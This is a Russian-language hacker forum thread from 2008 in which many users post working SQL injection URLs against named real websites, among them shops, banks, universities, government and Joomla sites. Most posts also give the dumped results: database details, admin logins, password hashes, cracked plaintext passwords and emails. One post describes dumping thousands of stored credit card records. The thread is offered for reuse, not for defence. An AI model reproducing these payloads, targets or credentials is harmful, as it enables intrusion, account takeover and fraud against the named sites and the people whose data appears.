COLLATION_CHARACTER_SET_APPLICABILITY
COLLATIONS
CHARACTER_SETS
----------------------
column:
COLLATION_NAME
MAXLEN
DESCRIPTION
DEFAULT_COLLATE_NAME
CHARACTER_SET_NAME

http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,login,password),4,5+from+usua rio+ limit+0,1/*

DezMond™

17.11.2008, 18:09

http://www.librenet.net/forum/post.php?id_post=652+union+select+1,2,concat_ws(0x 3a3a,COLUMN_NAME),4,5,6,7,8+from+inf ormation_schem a.columns/*&id_topic=41

http://www.librenet.net/forum/post.p hp?id_post=652+union+select+1,2,concat_ws(0x3a3a,p ass_user,login_user),4,5,6,7,8+from +user/*&id_topic=41

column:pass_user login_user
table:USER_PRIVILEGES administre_serveur moderation user

c3dric::6cc8260ee2bcc56083a35cd98b775f02(23041983)

DezMond™

17.11.2008, 18:28

http://belarusgo.com/view_subsection.php?page=2&id_subsection=68&id_city=9&id_section=-13+union+s elect+1,2,concat_ws(0x3a3a,login_user,password_use r),4,5,6 +from+user--

ThreeD

18.11.2008, 02:49

Четвёртая ветка, шоп.

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,id,passw ord,username,email),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39+from+users/*&cat_id=46&sub_id=312

1::flash62::wes::wes@joedesigns.com

Логинимся тут вроде
http://www.worldfolkart.org/cart_account.php

Картон )))

http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,cc_num,c c_name,cc_type),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39+from+orders/*&cat_id=46&sub_id=312

по count 4787 штук в базе, without cvv. Можете дампить, я плохими делами не занимаюсь.
Удачи )))

Chaak

18.11.2008, 21:58

Инъекция:
http://www.srpska.ru/article.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Инфо:
Database Version: 5.0.60
Database name: db_ansimov_7
User name: dbu_ansimov_1@localhost
Структура:
categories:
u_id
cat_id
cat_name
cat_parent
cat_descr

comm_members_list:
comm_id
u_id
u_status
comm_name

comments:
comm_id
comm_parent_id
comm_parent_type
comm_date
comm_header
comm_content
comm_autor

Инъекция:
http://zvisti.com.ua/info.php?id=-1+union+select+1,2,3,4,5,666,7,8,9,10,11,12--
Инфо:
Database Version: 5.0.45
Database name: zvisti_db
User name: zvisti_user@localhost
Структуру лень раскрывать было...

Инъекция:
http://www.anshlagm.ru/a-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Инфо:
Database Version: 4.1.22-log
Database name: melbis
User name: melbis@10.0.1.201

Neoveneficus

18.11.2008, 22:10

http://www.s7tour.ru/hotel.php?country=-1+union+select+1,version()/*

*** SQLBruter's report [ Tuesday 18th 0f November 2008 08:55:02 PM ] ***

[~] Names of tables bruteforce

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM hotel/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM news/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM poll_user/*

foopi

18.11.2008, 22:42

http://www.s7tour.ru/hotel.php?country=-1+UNION+SELECT+1,concat_ws(0x3a,username,userpass) +FROM+poll_user/*

plutus

19.11.2008, 02:41

http://irannag hme.com/viewalbums.php?artistId=-1+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword),3,4,5,6,7,8,9,10+from+users--

http://mp3hunga ma.com/music/viewalbums.php?artistId=-5+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword,email),3,4,5,6,7,8,9,10+from+users--

ThreeD

19.11.2008, 11:02

https://www.keeperstop.com/pages.php?id=7+union+select+1,2,3,version(),5,6,7/*

5.0.44-log

Таблица registrations ;)

ThreeD

19.11.2008, 12:41

http://www.chicgemsetc.com/press_article.php?id=-21+union+select+1,2,3,4,5,version(),7,8,9--

5.0.67-log

Ювелирка вроде.

Chaak

19.11.2008, 19:06

Инъекция:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

DB Version - 5.0.51a-log
DB User - charity_charity@localhost
DB Name - charity_charity

Таблицы:
beg_begs
beg_categories
beg_manager
beg_scam
beg_unwelcome
beg_users
categories
games
ratings

Таблица beg_users:
ID
beg_id
ip

Таблица beg_manager:
id
name
passwd

Таблица beg_unwelcome:
ID
email

Только что-то пароли не подходят :(

Email: http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,email,4,5,6,7,8,9,10,11,12,13+f rom+beg_unwelcome--
Пароль:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,passwd,4,5,6,7,8,9,10,11,12,13+ from+beg_manager--

peonix

19.11.2008, 19:59

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
bigmike : bigdent

ThreeD

20.11.2008, 02:14

Ещё одна ювелирка вроде.

http://www.atlasjewellery.com/enquiry.php?id=-147+union+select+1,2,3,4,5,6,version()/*

5.0.41-community-log

Sindicat

20.11.2008, 03:02

Красивый сайт нет слов ))

http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat_ws(0x3a,table_schema,tabl e_name),3,4+from+information_schema.tables+limit+3 51,1--

http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat(user_login,0x3a,user_pass ,char(32,32),user_nicename,char(32,32),user_email) ,3,4+from+asandcom_wordpress.wp_users+limit+1,1--

admin:$P$BkKicvsTytFhHOXTNGhYXCg25CvccO. admin zg@a-sand.com

zg:$P$BuYAHnmiu7Hx2ULVXEx1mMR8IyaSav/ zg zg@a-sand.com

sabe

20.11.2008, 07:44

http://www.ibtf.com.sy/page.php?page_id=-1+union+select+1,2,3,4,concat_ws(char(58),id,email ,password),6,7,8,9,0,1+from+admins
банк..
http://www.stplus.ru/content.php?id=-14+union+select+1,2,concat_ws(0x3a,login,password) ,4+from+admins--
компания.. пасс:a3xx-100

http://www.glier.ru/dsp.php?id=-1+union+select+1,2,login,4,5,6,pass,8,9,10,11,12,1 3,14+FROM+admins+limit+0,1--&did=9999
муз школа..

ThreeD

20.11.2008, 12:36

Ещё один банк.

http://www.vrlknowledgebank.com/reportinfo.php?id=-66+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(co ncat_ws(0x3A3a,user,password)+using+latin1),13,14, 15,16,17,18,19,20,21,22,23+from+mysql.user/*&page=3

root::297735bc666480a3::20To10

ThreeD

20.11.2008, 12:43

http://www.hoys.co.uk/shopping/exhibitor-view.php?id=-204+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15--

Продолжаем тему шоппинга в сети =)

5.0.51a

$n@ke

20.11.2008, 14:36

регионалки...пр5 и пр3

http://www.unabvirtual.edu.co/noticia.php?id=250{inj}
Database name: cms_uvirtual
Version: 4.0.21
User name: webman@eduvirtual.unab.edu.co

http://www.corporinoquia.gov.co/masinfo.php?id=-88{INJ}
Database name: corporin_acg
Version: 4.1.22-standard
User name: corporin_impacto@localhost

Iceangel_

20.11.2008, 17:45

1 edu, лень найденные на компе искать... на днях поболее выложу

http://soa.syr.edu/index.php?id=-4512+union+select+1,2,concat(user,0x3a,password,0x 3a,host,0x3a,file_priv),4,5,6,7,8,9,10,11,12,13+fr om+mysql.user+limit+0,1--

root:*430A4383A430D0DB40E90432B769B148BB9765D2:loc alhost:Y

Sindicat

20.11.2008, 18:19

http://top.yason.com.ua

http://top.yason.com.ua/kom.php?id=1+union+select+1,concat(login,0x3a,pass word),3,4,5,6+from+yasonua_top.users--

Hero1n

21.11.2008, 00:12

http://www.orby.es/index.php?id=-33+union+select+1,2,3,version(),5,6,7/*
http://www.plataformarefineriano.es/index.php?id=-466+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18/*
http://www.bomberosdeasturias.es/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9/*
http://extremadura.cnt.es/index.php?id=-1517+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16/*
http://www.fedemotocyl.es/index.php?id=-154+union+select+1,2,3,4,version(),6,7,8,9,10,11/*
http://www.casino-online-fr.com/es/id.php?ID=-1398+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
http://www.7casinoonline.com/it/es/id.php?ID=-1405+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
http://www.grandscasinos.com/es/id.php?ID=-1513+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
http://www.casino-fr-bonus.com/es/id.php?ID=-1414+union+select+1,2,version(),4,5,6,7,8,9,10,11/*

http://www.hamo.es/cat/news.php?id=-10+union+select+1,2,3,4,concat(login,char(58),pass word),6,7,8,9+from+usuarios/*
hamo:se73rXKXniZMM
Админки не нашёл :(

Hero1n

21.11.2008, 00:25

http://www.hoys.co.uk/shopping/exhibitor-view.php?id=-204+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15--

Продолжаем тему шоппинга в сети =)

5.0.51a
ws_users

user_login
user_pass

ThreeD

21.11.2008, 00:34

Hero1n
Там пятая версия,и таблицы подбирать не надо =) Кому надо,тот сдампит.

ThreeD

21.11.2008, 02:42

Заканчиваю тему ювелирок:
__________________

http://affiliate.findjewellery.co.uk/news-article.php?id=-12+union+select+1,2,version(),4,5,6,7,8/*

4.1.22-standard

__________________

http://www.mardojewellery.com.au/product_list.php?ID=28+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+ad min/*

4.1.22-standard-log
__________________

http://www.kestanejewellery.com/page.php?id=-426'+union+select+1,concat_ws(0x3A3a,id,type,user, password),3,4,5+from+users/*

5.0.45-log

19::admin ::karen:: opera
__________________

http://www.weddingsinwinnipeg.ca/jewellery.php?id=-107+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3A3a,password),12+from+administrators/*

4.1.20

9dfc5c7e39fc03ffb9698d37984d68a2::billion

__________________

http://www.georgejewellery.com/article.php?id=-28+union+select+version()/*

4.1.19-log

spherics

21.11.2008, 10:01

http://www.keckobservatory.org/article.php?id=-231+union+select+1,2, 3,4,5,6,7,8,9,10,11/*

Database Version: 4.1.22
Database name: keck
User name: keck@localhost

Вроде не было если было извиняйте...

spherics

21.11.2008, 14:42

http://vectoraerospace.ca/news.php?id=77+union+select+1,2,3,4,5,6,7,8,9/*
Выводимые {3},4,6,7,8,9

Database Version: 5.0.45
Database name: vector_db
User name: web@localhost

table admin_users
+user_id
+login_name
+password
+name
+level

vector:28e66ff14ddae884ee643708b8fe40be: Administrator pass: 105Bedford
dave mcgrath:57b1bd2bafca5a7ce9793b4b1f83b7b7:Administr ator: pass: raider
phil.self:e2f33497edb409cb56f1a629a45885a8:Adminis trator: pass: SIGMA1
evelyn.hensman:c1d96395bdac759e16b98789581c70d7:Ad ministrator pass: poprocks

Админка: http://vectoraerospace.ca/admin/

spherics

21.11.2008, 16:13

http://maadesign.co.uk/newsdetails.php?id=9+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14/*

version:4.1.22-standard
user:maa2_wwsol@localhost
database:maa2_wwsolution

Hero1n

21.11.2008, 16:47

http://www.windows-conservatories.co.uk/index1.php?id=-12+union+select+1,2,concat(LoginName,char(58),Pass word),4,5,6,7,8,9,10,11,12,13,14,15+from+Users/*

nova:race26
drrobinson:window
rep:novagroup
ftplimited:evesham
castlebridge:egremont
edenvalley:penrith
seniorswindows:kippax
leekglass:compton
cheadleglass:stockport
northernglass:rivulet
bebington:wirral
conservatories:power
kingdomwindows:glenrothes
idealwindows:hinge
ricks:focus
kirkton:Carluke
reps:belvedere
southcheshire:crewe
britwood:britwood
congleton:georgia
mmjoinery:butterber
RGowing:vale
centralglass:windowcill99
Paul:novagroup
studleycons:shawbank
DDCL:zouch
WardGlass:FREEL
perennial:marple
meirglass:sandon
econnor:joinery
johnroberts:Forwyn
chambers:workington
humberside:trafford
gpearce:weir
patelever:hazel
tjones:cibyn
wearingbuild:wirral
washington:derby
dgms:york
meadowview:bronhaul
orionwindows:audax
davehopton:braemar
csglaziers :Buckley
taplastics:ctudhoe

-m0rgan-

22.11.2008, 00:21

скуди в joomla:
http://www.feellove.eu/exptemp/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+ FROM+jos_users--
логин/пасс:
admin:eb9d2dcd0b8beb9c3ae60f21d0e78578
---------------------------------
http://www.gamenuke.org/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,1,concat(username,0x3a,password)+ FROM+jos_users--
логин/пасс:
Atomm:c404d8ecb25650f4c75911e4cca03563:jw9dEIiUcxC ZIgQy
-----------------------------------
http://phhboxing.org/index.php?option=com_expshop&page=show_payment&catid=-2+UNION%20SELECT+1,2,concat(username,0x3a,password )+FROM+jos_users--
логин/пасс:
ninjiharris:dbafe7bfe987485c997fc65ccf2530bf:sDYp0 Go5mwiG0df6
---------------------------------
http://www.toybrickid.com/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+ FROM+jos_users--
логин/пасс:
admin:d6358b73f5c624301eea3a9ba9bfbd1b:BoDk5m5hVyt ohLhE
---------------------------------------
http://www.freewebstemplate.net/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+ FROM+jos_users--
логин/пасс:
admin:e64bdb8d05f73f025c859eede39007fe:oVZJ0FrZdvq fJyHo
---------------------------------------
php nuke:
http://www.ediliziaesistemi.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,aid+from+nuke_authors--
http://www.ediliziaesistemi.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,pwd+from+nuke_authors--
логин/пасс:
Elisabetta:e27cc622d1e87601a77f55087a40bf3f
расшифровка:
Elisabetta:613939
----------------------------------------------
The End!

-m0rgan-

22.11.2008, 00:56

http://www.je.is/index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*&Itemid=0&sP=0
логин,пасс:
admin:0b3574ee3dc278785e266fe300688ab5
--------------------------------------
http://www.redinet.am/index.php?lng=-1+union+select+1,2,3,concat_ws(0x3a,name,pass),5,6 ,7,8,9,10,11+from+users+limit+0,1/*
логин,пасс:
editor:158de3c5219fa1bb
---------------------------------------
http://www.trainingteam.net/index.php?option=com_rekry&Itemid=60&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17%20from%20jos_users%20limit%20 1,1--
логин,пасс:
balihotchili:2be600495ab19e130b6ec56969156a56:8KkL Puai8wSUH19W
-------------------------------------
http://www.microhydropower.net/news/viewnews.php?ID=-1+UNION+SELECT+1,concat(username,0x3a,password),3, 4,5,6,7+FROM+users--
логин,пасс:
kubu:freedom
--------------------------------------
http://www.berceaumagique.com/cat.php?id=-6+union+select+1,2,3,concat_ws(0x3a,login,0x3a,pas s,0x3a,mail),5,6,7,8,9+from+admin+where+id=1--
логин,пасс,мыло:
charlotte:::407686174a65f5219d4b2132df7d29fa:::c.g aillard@berceaumagique.com
-----------------------------------------
http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
логин,пасс:
mofad:25eabb60d24d19239d075a7917c207a5
-----------------------------------------
http://www.mtvphil.com/news.php?id=-17+union+select+1,2,3,4,concat(username,0x3a,passw ord),6,7,8,9,10,11+from+members+limit+0,1--
логин,пасс:
lenard:f1d8c6941e9b92bdc6d60615b069e882
---------------------------------------
http://www.almemo.org.al/rub.php?l=a&idr=12+and+1=2+union+all+select+1,2,3,concat(usern ame,char(58),password),5,6,7,8+from+editor--
логин,пасс:
admin:fe01ce2a7fbac8fafaed7c982a04e229
---------------------------------------
The End!

Ponchik

22.11.2008, 00:57

Хакнем презики :D
contex-condom.ru
На уровне пакета
GET http://www.contex-condom.ru/link.php?lnk_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,VERSION(),10,11-- HTTP/1.0
Host: www.contex-condom.ru
ответ
HTTP/1.1 302 Found
Date=Fri, 21 Nov 2008 20:56:49 GMT
Content-Type=text/html; charset=windows-1251
Transfer-Encoding=chunked
Connection=keep-alive
Keep-Alive=timeout=5
Server=Apache
Cache-Control=max-age=0
Expires=Fri, 21 Nov 2008 20:56:49 GMT
Location=5.0.67-log
таблы (учтите, они в разных БД, в этой с префиксом xru_)
chat_entries
chat_users
md_adm
md_adm2type
md_bbs
md_bbs_type
md_cnf
md_fil
md_img
md_lnk
md_tab
md_txt
md_type
md_usr
xru_adm
xru_adm2type
xru_banner_stats
xru_cnf
xru_downloads
xru_fil
xru_img
xru_lnk
xru_tab
xru_txt
xru_type

FNS

22.11.2008, 01:07

http://www.marclothing.com/news.php?ax=v&n=9&id=9&nid=-58+union+select+1,version(),3,4,5--
4.1.22-standard-log

FNS

22.11.2008, 03:16

http://www.gocontempo.com/pages.php?id=-2/**/union/**/select/**/1,2,3,table_name,5,6,7,8,9,10,11,12,13,14+from+`in formation_schema`.tables--
http://www.gocontempo.com/pages.php?id=-2/**/union/**/select/**/1,2,3,group_concat(UserName,0x3a,UserPwd),5,6,7,8, 9,10,11,12,13,14+from+tblusers--
http://www.gocontempo.com/admin/
adm1n:webm1n,contempo:alex1983,gocontempo:furnitur e1

FNS

22.11.2008, 03:30

http://www.sunshinejewelry.com/cs.php?id=-2+union/**/select/**/1,2,table_name,4/**/from/**/`information_schema`.tables+--+
5.0.51a-community

-m0rgan-

22.11.2008, 17:48

Вот снова не большой збор скулей от меня:
http://www.tregu-kosovar.com/inseratedetails.php?id=247'+and+1=1+union+all+sele ct+1,2,3,4,5,concat(username,char(58),passwort),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5+from+az_user/*&refid=&lang=
логин/пасс:
leaa:21881
------------------------------------------------
http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(5 8),username,password)+using+utf8),4,null,6,null,8, 9+from+login--
логин/пасс:
admin:mbreti
---------------------------------------------
http://www.mycybermedia.com/listo_kategori.php?kategorianr=-9999+union+all+select+1,2,3,4,null,concat_ws(char( 58),username,password),7,8,9,10,11,12+from+admin--
логин/пасс:
admin:admin
------------------------------------------
http://www.albauto.com/rallyalbania/galeri_info.php?ida=26+and+1=2+union+all+select+1, 2,3,concat(username,char(58),password),5,6+from+ed itor/*&page=29
логин/пасс:
admin:ee99fafdaf801531af8861addda2603c
--------------------------------------------
http://www.environment.adanet.com.al/tekst.php?idt=16+and+1=2+union+all+select+1,concat (user,char(58),password),3,4,5,6,7,8,9,10+from+mys ql.user/*
логин/пасс:
root:54c57d3714ca092d
------------------------------------------
http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58), name,pass),6,7,8,9+from+users+limit+1,1/*
логин/пасс:
drupal:9536bdcd9e3faa581d6991b5d04ac4ec
-----------------------------------------
http://www.wonpwn.com/games.php?id=-2'+union+select+1,username,3,user_password,5,6,7,8 ,9,0,1+from+bb2_users+limit+1,1/*
логин/пасс:
JimmyDinner:2e4b43e13698dd4df580f90b76b0de2a
----------------------------------------
http://www.housescreen.be/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,us ername,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+s ignup--
логин/пасс:
frans:9d0aa885d8b6db599231726fd377f739
benny:74d39d16ccd8128184800880e529db76
Eveline:c45817c7a68626d7428e95e3a0dad694
Dsky:7d91594f16e9674749bc1cf3f91752af
Bart:008884c57916bb8fd80421cfed45ac38
[test:098f6bcd4621d373cade4e832627b4f6
-------------------------------------------
http://www.ajaxprojects.com/ajax/viewcategory.php?categoryid=-8+union+select+1,2,concat(username,0x3a,0x3a,passw ord,0x3a,email),4,5,6,7+from+user/*
логин/пасс/мыло:
ajax::29062006:ajaxteam@gmail.com
----------------------------------------------
http://www.heimlichinstitute.org/page.php?id=null+UNION+ALL+SELECT+1,convert(concat (user,0x3a,password)+using+latin1),3,4+FROM+mysql. user--
логин/пасс:
root:*C3F44A16E1B0CA7DABAA9587D64AF55B1C7833C4
-----------------------------------------------
http://www.donabauer.at/bookmarks//view_group.php?id=-1+union+select+0,1,concat_ws(0x3a,username,passwor d),3,4,5,6,7+FROM+apb_users--
логин/пасс:
gast:27wvfetVjvcRo
------------------------------------------------
http://www.aesouk.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password ),3,4+from+admin--
логин/пасс:
Categories within admin:$1$p8EHR3eg$brgVoxx0n4udlQ35s2iCo0
-------------------------------------------------
http://www.schuetzenbund.de/shop/list.php?id=-21%27+union+select+1,concat_ws(char(58),name,passw ord),3,4,5,6,7,8,9+from+user/*
логин/пасс:
admin:sh00ting
------------------------------------------------
http://www.solusihukum.com/artikel.php?id=-1+union+select+1,2,concat_ws(0x10,pwd,uid),4,5+fro m+user/*
логин/пасс:
jingklong:kong
agungjuga:agung
jalil:andy
---------------------------------------------
http://www.tiranatimes.com/newscat.php?id=5+and+1=1+union+all+select+1,concat (username,char(58),password),3,4,5+from+tt_users/*&cat=5
логин/пасс:
GEMA:GEMATT
---------------------------------------------
The End!

Ламоза

22.11.2008, 19:20

http://www.chicken.org.au/page.php?id=-150+union+select+1,2,3,4,5,login,7,password,9,10,1 1,12,13+from+users/*

http://www.rsphysse.anu.edu.au/nuclear/personnel.php?id=-50+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*

nucleus_reader@rsphyweb.anu.edu.au
nucleus
5.0.45

access_log awards change_log classifications collaboration_files contact_info document_changes document_classes document_templates documents documents_emg_save grant_classes grant_schemes grant_types grants groups_blurbs groups_photos job_adverts notices people_links peoples_groups peoples_publications personnel project_types projects projects_contacts projects_types publications reference_transform research_groups resource_form_types resource_forms resource_link_types resource_links schedule_annotations schedule_entries schedule_equipment schedules seminars tank_openings

http://ausmed.com.au/publications/displaybook.php?id=-38+union+select+1,aes_decrypt(aes_encrypt(version( ),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.11

Hero1n

22.11.2008, 19:41

http://www.totstotravel.co.uk/index2.php?id=-8+union+select+1,version(),3/*
4 версия, не получилось подобрать имена таблиц

WAR!9G

22.11.2008, 19:56

4 версия, не получилось подобрать имена таблиц
имя таблицы - дефаулт: mysql.user

http://www.totstotravel.co.uk/index2.php?id=-8+union+select+1,2,3+from+mysql.user/*

Вот только прав недостаточно:
Error 1142 : SELECT command denied to user 'tots'@'server213-171-218-213.livedns.org.uk' for table 'user'

BanQui

22.11.2008, 21:39

Ну вот нашел http://www.rfbd.ru/info.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14&region=&rubrika=3--
Version: 5.0.37-standard-log
Ну кароч на сайте ниче полезного не нашел!Воть ссылка на перебол таблиц
http://www.rfbd.ru/info.php?id=-2+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14+from+information_schema.tables+limit+1,1&region=&rubrika=3--

faza02

22.11.2008, 23:30

http://www.k9magazine.com/pages.php?pid=7+and+0+union+select+1,convert(user( )+using+latin1),3,4/*
user(): k9_magazine1@64.111.99.240
database(): k9magazine1
version(): 4.1.16-standard-log

spherics

23.11.2008, 08:51

http://www.fretz-music.co.uk/news.php?id=3+union+select+1,2 ,3,4,5,6,7/*

5.0.27
fretzdb@localhost
fretzdb

http://www.questionbox.org/news.php?type=news&id=3+union +select+1,2,3,4,5,6,7,8,9/*
4.0.27-max-log
dbo231123474@74.208.16.57

http://www.gomountainlions.com/news.php?id=3+union +select+1/*
Database Version: 4.1.22-standard
Database name: athletics
User name: athletics@localhost

http://billiard4u.net/article/article.php?id=-39+union+select+1,2,version(),4,5,user(),7,8,9,dat abase(),11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36--

4.1.22-standard
main_mainbilluse@localhost
main_mainbilldb

http://www.econepal.org/news.php?id=14+union+select+1,2,3,4, 5,6,7--&newstype=1
Database Version: 5.0.67-community
Database name: econepal_econep
User name: econepal_ecouser@c05.privatesystems.net

xPriZrAkx

23.11.2008, 11:01

http://www.michaelpollan.com/article.php?id=1+union+select+1,version(),3,4,5,6, 7,8,9,10--
4.1.22-standard
pollan_article@localhost

http://www.plaza-shopping.com/shop.php?id=3982+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--
4.0.27-max-log
plazashopping@68.178.232.199

http://www.forbidden-paradise.de/eng/shop.php?CAT=picture&ID=17455+union+select+1,2,3,version(),5,6,7,8,9,10 ,11,12--
4.0.15
web25@localhost

http://www.shopavalonmall.com/store.php?id=6435+union+select+1,version(),3,4,5,6 ,7,8--
4.0.26-standard
aval3_webadmin@ns50.secureserver50.com

http://www.walkerspopcorn.com/store.php?p=itm&id=256+union+select+1,2,3,4,version(),6,7,8,9,10,1 1--
5.0.51a-community

Hero1n

23.11.2008, 21:38

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6--

5.0.51a-community-log:amschfes_jim@localhost:amschfes_amschfes

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,table_name,3,4,5,6+from+informati on_schema.tables+limit+32,1--

users_usr

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,column_name,3,4,5,6+from+informat ion_schema.columns+where+table_name=0x75736572735f 757372+limit+0,1--

Id_usr
firstname_usr
lastname_usr
pword_usr
userlevel_usr
username_usr
email_usr

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,concat(username_usr,0x3a,pword_us r,0x3a,email_usr),3,4,5,6+from+users_usr+limit+0,1--

jcamomile:ginger:jcamomile@pobox.com
mhasbrouck:hope4fez:mhasbrouck@aol.com
elozano:tigers:edlo57@yahoo.com - пасс подходит на мыло.

satana8920

23.11.2008, 22:25

Продолжаем тему edu =)
1й пошел =)
сайт: http://www.bme.gatech.edu
уязвимость:
http://www.bme.gatech.edu/people/faculty_record.php?id=-1'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22/*
инфо:

Database Version: 4.1.22
Database name: faculty
User name: web@localhost

2й

Сайт: https://its.kennesaw.edu/
Уязвимость: https://its.kennesaw.edu/cms/index.php?id=-1+Union+select+1,2,3,version(),5/*
Инфо:

Database Version: 4.0.17-standard-log
Database name: cms
User name: cms@localhost

3й

Сайт:http://www.uhh.hawaii.edu/
Уязвимость:http://www.uhh.hawaii.edu/academics/hohonu/writing.php?id=-1+union+select+1,version(),3,4,5,6/*
Инфо:

Database Version: 4.1.22-log
Database name: hohonu
User name: hohonu@www.uhh.hawaii.edu

4й

Сайт:http://dispatch.fandm.edu/
Уязвимость: http://dispatch.fandm.edu/category.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*
Инфо:

Database Version: 4.1.22-log
Database name: dispatch
User name: dispatch_reader@localhost

Еси кто расковыряет дальше то стучите самому лень так как 4я версия %)

-m0rgan-

24.11.2008, 00:14

http://www.pro-xenon.ru/news.php?id=-1+union+select+1,concat(username,0x3a,user_passwor d),3+FROM+phpbb_users+limit+1,1--
логин/пасс:
ProXenon.Ru:e25325d4885c130ab5b652109adef63f
------------------------------------------
http://nigatrade.biz/realty/zakaz.php?id=-1+union+select+1,2,3,4,concat(name,0x3a,pwd),6,7,8 ,9,10,11,12+FROM+admins--
логин/пасс:
rgk:686ff67efba121e906356233872afd2d
-------------------------------------------
http://katalog.motorky.com/moto.php?id=-150+union+select+1,2,concat(username,0x3a,user_pas sword),4,5,6,7,8,9+FROM+phpbb_users+limit+1,1--
логин/пасс:
2 admin:bec47636b1594d444b88ec9eb4f15c7a
---------------------------------------------
http://yalta.org.ua/pages/person.php?id=-1+union+select+1,2,3,concat(nick,0x3a,password,0x3 a,name,0x3a,email,0x3a,status),5,6,7,8,9,10,11,12, 13,14+FROM+user_data--
логин/пасс/имя/мыло/работа/статус:
Alex:1010:Игорь Данилов:3ddd@yalta.org.ua:0
--------------------------------------------
http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a %20,user_password,0x3a,user_email,0x3a,user_icq),3 ,4,%205,6+from+phpbb_users+limit+1,1/*
логин/пасс/мыло/ася/имя:
administrator:e04796528f705256f97a8c290bfd3070:kov alev@smartcard.ru
http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a %20,user_password,0x3a,user_email,0x3a,user_icq),3 ,4,%205,6+from+phpbb_users+limit+1,600/*
Собираем спам-базу :D :D :D
--------------------------------------------
http://ron.the-underdogs.info/game.php?id=-135+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,concat_ws(0x3a,user,password) ,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql .user/*
логин/пасс:
root:4bca6e21230d24de flashback:4e62830249e37403
ron:1b4fdeb00b833ac5 macgarden:4a5fe7e15ca085b0 Underdogs:4bca6e21230d24de doggie:69288c4855bbb52a
forum:3bd00f75423ddffd
hotu:3213f1351227ad25
